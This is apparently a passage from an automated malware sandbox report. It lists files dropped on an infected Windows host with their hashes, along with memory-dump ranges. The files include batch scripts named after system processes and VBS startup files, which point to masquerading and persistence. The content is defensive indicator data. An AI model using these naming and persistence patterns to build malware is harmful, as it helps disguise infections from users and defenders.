                                                                                                            SHA256

                                                                                                            9f32111b998a6bd796d09ec4495566e19f0db135bdd399abe4ec5f2508141d68

                                                                                                            SHA512

                                                                                                            30ff89aa115f030d856b337c2507c9398ff17560fb3a6fe001cccc253f5a0514165b41b9bfaa0d37e3f8eaf05264c8ec9c54fbde18a7e683fd963059b17757b5

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            c548ed01ae645adff1598bd0dcfb16c7

                                                                                                            SHA1

                                                                                                            14c0583817bd5f62190f2e167dff7b1be066c173

                                                                                                            SHA256

                                                                                                            f126e6f7c0898e5dfcda73ecdd6bd3205c6e9d416d9971e92a403d5bae47c4bb

                                                                                                            SHA512

                                                                                                            1ba317543c77ba9c385370b6fbdefb3339a9b53db8b9b0ad5415ecd9261c9fbeb7d7efd2c4d1ddb7b50fde73e23c36284755bd604a0c9d339be2112ed3353a65

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            56fd2bc3a8a94e679815a7ef8d9a6ee3

                                                                                                            SHA1

                                                                                                            60d4f84e04d5ed2050fa1ac06cdbc41471547d24

                                                                                                            SHA256

                                                                                                            97fe24084be215a5171782c2addf9a00dcd15b97d269a330b8ac73375f726ef1

                                                                                                            SHA512

                                                                                                            8a5b06ce81e0eaf385d3ec94561ae431e1f262b8733f7adc2141d74c59d63d02e74d45c35e7ffb1be1c4c999f5983465cc067ee1fedb964844302e5522c76041

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            c6fd07eb54759e15ea7f5f4dd9a82adf

                                                                                                            SHA1

                                                                                                            9aa483eea0adec5588c6e0b0f632d6b4f909bdeb

                                                                                                            SHA256

                                                                                                            acb8c6d1373d893039d6fd4efe8d536708163ae3749b899be0e2f74c5876e216

                                                                                                            SHA512

                                                                                                            179839e1758814ce0761abe81809552d7647cf58ea16e99b4952b16d44080a6389ba7722ebf18617b1c2c5d38b21b0b62e25ca81f9984aa21d28e00a9422120f

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Filesize

                                                                                                            1KB

                                                                                                            MD5

                                                                                                            02ff25a2b8922d643cfe94f681a12e7e

                                                                                                            SHA1

                                                                                                            7c7e4dbe073e6c67330d4c08586c987a687b4188

                                                                                                            SHA256

                                                                                                            8bf6ebc47146467a46543124876c4b4cd2791c72b785d18ffe67c8b2d230e050

                                                                                                            SHA512

                                                                                                            8caa6b3cc65aaf591e41f1dc746334a0a6ca904c32a98b7483870912172dbf131e49077cc6238cd436020125be85ca052cc2f69c3298f8972e37e8df51fee2fd

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Filesize

                                                                                                            1KB

                                                                                                            MD5

                                                                                                            6bd32908cca3ad2cf9607410f5ec2b99

                                                                                                            SHA1

                                                                                                            e4776891be1e9b7bc1483b6c7ba11e42c6ab1efa

                                                                                                            SHA256

                                                                                                            29d939da16fb198a4c7c5c11cb06033ad10c92c514de497585638b18fb7c1962

                                                                                                            SHA512

                                                                                                            db0f2f0deef4c3bd248669001f22132c7ee896ad23132fbe3e68a674a7c100583551174a250eae0004cabdce9023561a0342eeca184a8807340c1ff131b918e3

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_miyo3y53.szo.ps1

                                                                                                            Filesize

                                                                                                            1B

                                                                                                            MD5

                                                                                                            c4ca4238a0b923820dcc509a6f75849b

                                                                                                            SHA1

                                                                                                            356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                            SHA256

                                                                                                            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                            SHA512

                                                                                                            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                          • C:\Users\Admin\AppData\Local\conhost.bat

                                                                                                            Filesize

                                                                                                            274KB

                                                                                                            MD5

                                                                                                            e19333732c953dccd21bd997320a7a53

                                                                                                            SHA1

                                                                                                            93462b009375d7bb5434843b871dc439c9b8555d

                                                                                                            SHA256

                                                                                                            0556c1dcf0f0928084b9067e210e8b72c79dd02831b70a4f4e81c4e3298ff3d9

                                                                                                            SHA512

                                                                                                            cde6e8475e5433d51a9f2fb2db3cbf46e86089392344da43e194c3da90005597a56140cd580a2c6edfbcde9a95618c1233160d1ff79d049efcbdad62ee06bdf3

                                                                                                          • C:\Users\Admin\AppData\Local\dllhost.bat

                                                                                                            Filesize

                                                                                                            83KB

                                                                                                            MD5

                                                                                                            fc1bd57fa57b7b5c512746c7de3fa19a

                                                                                                            SHA1

                                                                                                            7f794e6459def2dcc346d562aacca372e7282270

                                                                                                            SHA256

                                                                                                            8977812b16f1e3d827cbce1675d9ad9e2f0370cf27cb3b23b389594739c3b837

                                                                                                            SHA512

                                                                                                            71a1908e1625c9ef28c5a85ca21dfdadcebfc4ae41b21ba2d11a92e1192a49a819adde6fb30fb9f2e8f4199a264c56e86f9d21a67704f7b25b8dbdd9c43b07d9

                                                                                                          • C:\Users\Admin\AppData\Local\svchost.bat

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                            MD5

                                                                                                            74f5686e51d07dab9f43f62081f83003

                                                                                                            SHA1

                                                                                                            8d6b22e17db345f43ec3db13748c162d3cd1b229

                                                                                                            SHA256

                                                                                                            52974d82b405f9ebba25b6de26cbf2c59f4ec9e4d6c7059661f9f2f02e29d03e

                                                                                                            SHA512

                                                                                                            5865a681a5e9b3464351a4d9e5bf18dccf3ed43f288c388decfa8559e496c67a563acadd8b7563e4004fe320298b47842a5a672552f14a95772460f54f782384

                                                                                                          • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.vbs

                                                                                                            Filesize

                                                                                                            124B

                                                                                                            MD5

                                                                                                            a18bd6dc1b350c27c0b6b3b97280e05a

                                                                                                            SHA1

                                                                                                            5942904aba32ab36623722eb18017644755e1f02

                                                                                                            SHA256

                                                                                                            ef73bc9d025e3d7672a6dee2164fc33f9a2337d8e1b992527c7cffef31604517

                                                                                                            SHA512

                                                                                                            b84af565893f6bed5389df962a7fd262fa02c4bca09c89bd8708c8ce46aa1bb542d76daa5745ce435b79fc409da1cafd9ae1ff4e9f0ed35a2773bbae7ca58294

                                                                                                          • C:\Users\Admin\AppData\Roaming\$svchost_724.vbs

                                                                                                            Filesize

                                                                                                            112B

                                                                                                            MD5

                                                                                                            915c576845b00de7b55928536eb8a5c5

                                                                                                            SHA1

                                                                                                            d87a9df7bd6a3724f42726c8c09301680e319192

                                                                                                            SHA256

                                                                                                            b6e404b9cd7d0692adee73269af4645190b4b40a7f4d38ba8184cf9eee9b314d

                                                                                                            SHA512

                                                                                                            dd0c34e70f8565ee210349c27f787ebf5a9db09472a24020af4096c4f6955cdca9d42a353993158a291255aa0102f97ab85a766bd03e86bb23674573fc0f8334

                                                                                                          • memory/732-368-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/816-374-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/1216-371-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/1352-329-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/1360-326-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/1368-325-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/1408-372-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/1560-370-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/1752-327-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/1904-373-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/2512-333-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/2520-332-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/2556-323-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/2688-456-0x0000021F4DF40000-0x0000021F4DF48000-memory.dmp

                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/2688-457-0x0000021F4E430000-0x0000021F4E46C000-memory.dmp

                                                                                                            Filesize

                                                                                                            240KB

                                                                                                          • memory/2704-328-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/2732-331-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/2748-324-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/3384-322-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/3384-310-0x0000000000F70000-0x0000000000F9A000-memory.dmp

                                                                                                            Filesize

                                                                                                            168KB

                                                                                                          • memory/3560-399-0x000002586A1C0000-0x000002586A1CE000-memory.dmp

                                                                                                            Filesize

                                                                                                            56KB

                                                                                                          • memory/4712-330-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/4868-369-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/4920-77-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

                                                                                                            Filesize

                                                                                                            9.9MB

                                                                                                          • memory/4920-56-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

                                                                                                            Filesize

                                                                                                            9.9MB

                                                                                                          • memory/4920-7-0x00000110D86B0000-0x00000110D86D2000-memory.dmp

                                                                                                            Filesize

                                                                                                            136KB

                                                                                                          • memory/4920-10-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

                                                                                                            Filesize

                                                                                                            9.9MB

                                                                                                          • memory/4920-23-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

                                                                                                            Filesize

                                                                                                            9.9MB

                                                                                                          • memory/4920-36-0x00000110D8870000-0x00000110D88AC000-memory.dmp

                                                                                                            Filesize

                                                                                                            240KB

                                                                                                          • memory/4920-47-0x00000110D8CB0000-0x00000110D8D26000-memory.dmp

                                                                                                            Filesize

                                                                                                            472KB

                                                                                                          • memory/4920-78-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

                                                                                                            Filesize

                                                                                                            9.9MB

                                                                                                          • memory/4920-57-0x00000110D88B0000-0x00000110D88B8000-memory.dmp

                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/4920-59-0x00000110D8E00000-0x00000110D8ED0000-memory.dmp

                                                                                                            Filesize

                                                                                                            832KB

                                                                                                          • memory/4920-3-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4920-58-0x00000110D8D30000-0x00000110D8E02000-memory.dmp

                                                                                                            Filesize

                                                                                                            840KB

                                                                                                          • memory/5048-206-0x0000024DC9EA0000-0x0000024DC9ED6000-memory.dmp

                                                                                                            Filesize

                                                                                                            216KB

                                                                                                          • memory/5048-205-0x0000024DC9A10000-0x0000024DC9A18000-memory.dmp

                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/5060-84-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

                                                                                                            Filesize

                                                                                                            9.9MB

                                                                                                          • memory/5060-85-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

                                                                                                            Filesize

                                                                                                            9.9MB

                                                                                                          • memory/5060-485-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

                                                                                                            Filesize

                                                                                                            9.9MB

                                                                                                          • memory/5068-153-0x0000025F80000000-0x0000025F81000000-memory.dmp

                                                                                                            Filesize

                                                                                                            16.0MB

                                                                                                          • memory/5068-151-0x0000025FFF430000-0x0000025FFF438000-memory.dmp

                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/5068-152-0x0000025FFF4D0000-0x0000025FFF4E2000-memory.dmp

                                                                                                            Filesize

                                                                                                            72KB